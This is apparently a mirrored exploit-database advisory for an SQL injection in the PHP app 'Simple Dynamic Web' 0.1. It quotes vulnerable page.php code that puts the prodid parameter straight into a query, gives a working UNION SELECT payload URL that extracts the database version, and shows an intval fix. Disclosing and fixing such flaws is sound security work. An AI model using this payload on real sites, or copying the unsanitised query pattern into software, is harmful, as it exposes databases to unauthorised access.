扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 |
# Exploit Title.............. Simple Dynamic Web SQL Injection # Google Dork................ N/A # Date....................... 14/10/2016 # Exploit Author............. lahilote # Vendor Homepage............ http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html # Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Chinthaka%20Deshapriya/dynamic_web_page.zip # Version.................... 0.1 # Tested on.................. xampp # CVE........................ N/A The audit_list in /page.php ----snip---- $prodID = $_GET['prodid']; if(!empty($prodID)){ $sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error()); $getProdInfo = mysql_fetch_array($sqlSelectSpecProd); $ptitle = $getProdInfo["title"]; $pdes = $getProdInfo["description"]; $pimg = $getProdInfo["imgUrl"]; } ----snip---- Example exploitation -------------------- http://server/path_to_webapp/page.php?prodid=-3%27%20union%20select%201,2,@@version,4--+ How to fix ---------- Simple method's use the php function intval. For example $prodID = intval($_GET['prodid']); if(!empty($prodID)){ $sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error()); $getProdInfo = mysql_fetch_array($sqlSelectSpecProd); $ptitle = $getProdInfo["title"]; $pdes = $getProdInfo["description"]; $pimg = $getProdInfo["imgUrl"]; } Credits ------- This vulnerability was discovered and researched by lahilote References ---------- http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html http://php.net/manual/en/function.intval.php |
体验盒子
